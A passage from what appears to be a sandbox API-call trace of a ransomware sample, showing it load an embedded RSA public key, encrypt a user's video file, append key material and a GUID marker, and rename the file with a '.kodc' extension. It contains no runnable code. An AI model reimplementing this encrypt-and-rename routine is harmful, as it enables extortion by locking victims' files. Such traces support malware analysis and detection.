lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x10e03, lpOverlapped=0x0) returned 1 [0100.140] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0100.140] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.140] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.140] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0100.141] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0100.141] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0100.141] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0100.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0100.141] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0100.141] GetLastError () returned 0x0 [0100.141] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0100.141] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0100.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.141] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0100.141] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0100.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.141] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0100.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e00) returned 0x9bb8968 [0100.142] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0100.142] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0100.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0100.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0100.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c3d0 [0100.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ba8 [0100.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c418 [0100.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7bc0 [0100.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7bf0 [0100.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c08 [0100.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0100.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0100.142] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0100.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0100.142] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7bf0 | out: hHeap=0x630000) returned 1 [0100.142] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c08 | out: hHeap=0x630000) returned 1 [0100.142] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.142] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0100.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0100.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0100.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7c08 [0100.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0100.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7bf0 [0100.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0100.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c770 [0100.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0100.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0100.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0100.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0100.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0100.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c08 | out: hHeap=0x630000) returned 1 [0100.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7bf0 | out: hHeap=0x630000) returned 1 [0100.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0100.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0100.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0100.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.143] GetCurrentThreadId () returned 0x42c [0100.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0100.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba66f8 [0100.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0100.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0100.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0100.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0100.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.144] GetCurrentThreadId () returned 0x42c [0100.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0100.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0100.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0100.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0100.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0100.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0100.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0100.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0100.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0100.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7bf0 [0100.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0100.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0100.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0100.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0100.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0100.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c08 [0100.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0100.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0100.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0100.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7bd8 [0100.146] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0100.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.146] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.146] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.146] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0100.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7c20 [0100.146] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a10 [0100.146] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0100.146] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0100.146] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0100.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0100.146] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7bf0 | out: hHeap=0x630000) returned 1 [0100.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7bf0 [0100.146] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0100.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0100.146] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0100.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.147] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0100.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0100.147] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c540 [0100.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.147] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0100.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7bf0 | out: hHeap=0x630000) returned 1 [0100.147] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x6948b0 [0100.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0100.147] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0100.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0100.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0100.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0100.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0100.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0100.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6948b0 | out: hHeap=0x630000) returned 1 [0100.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0100.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c20 | out: hHeap=0x630000) returned 1 [0100.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0100.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c08 | out: hHeap=0x630000) returned 1 [0100.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7bd8 | out: hHeap=0x630000) returned 1 [0100.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0100.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0100.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0100.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7bc0 | out: hHeap=0x630000) returned 1 [0100.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c418 | out: hHeap=0x630000) returned 1 [0100.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0100.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0100.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0100.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0100.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0100.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0100.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0100.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0100.148] WriteFile (in: hFile=0x5cc, lpBuffer=0x9bb8968*, nNumberOfBytesToWrite=0x10dfe, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9bb8968*, lpNumberOfBytesWritten=0x9e2fb14*=0x10dfe, lpOverlapped=0x0) returned 1 [0100.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8968 | out: hHeap=0x630000) returned 1 [0100.149] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x10e03, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.149] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0100.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0100.149] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0100.149] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0100.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0100.149] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0100.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0100.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0100.149] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0100.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0100.149] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0100.149] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0100.149] CloseHandle (hObject=0x5cc) returned 1 [0100.151] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0100.151] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x870) returned 0x333bc58 [0100.151] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0100.151] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j20KuR.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\j20kur.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j20KuR.mkv.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\j20kur.mkv.kodc")) returned 1 [0100.152] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0100.152] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.152] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.154] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0100.154] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf46ef3b0, ftCreationTime.dwHighDateTime=0x1d5c001, ftLastAccessTime.dwLowDateTime=0x6f722ac0, ftLastAccessTime.dwHighDateTime=0x1d5c492, ftLastWriteTime.dwLowDateTime=0x6f722ac0, ftLastWriteTime.dwHighDateTime=0x1d5c492, nFileSizeHigh=0x0, nFileSizeLow=0x1681c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Jg7ye.flv", cAlternateFileName="")) returned 1 [0100.154] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0100.154] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0100.154] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0100.154] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Jg7ye.flv") returned=".flv" [0100.154] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Jg7ye.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jg7ye.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0100.154] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: 